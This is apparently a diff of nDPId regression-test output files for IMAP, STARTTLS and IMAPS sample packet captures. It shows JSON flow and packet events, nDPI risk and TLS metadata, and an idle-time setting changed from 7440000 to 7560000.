00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"}
00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437584567812,"flow_last_seen":1437584567812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437584567812,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"}
00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":6193,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1437584570828}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 32/32

12
test/results/imap.pcap.out
View File

@@ -1,11 +1,11 @@
00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imap.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1213095262213}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213095262213,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1213095262213,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}}
00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213095262213,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1213095262213,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}}
00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}}
00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-data-len":1580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1213095266780}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 33/33

16
test/results/imaps.pcap.out
View File

@@ -1,13 +1,13 @@
00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imaps.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590857744659}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590857744659,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1590857744659,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"}
00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}}
00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590857744659,"flow_last_seen":1590857744659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1590857744659,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"}
00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
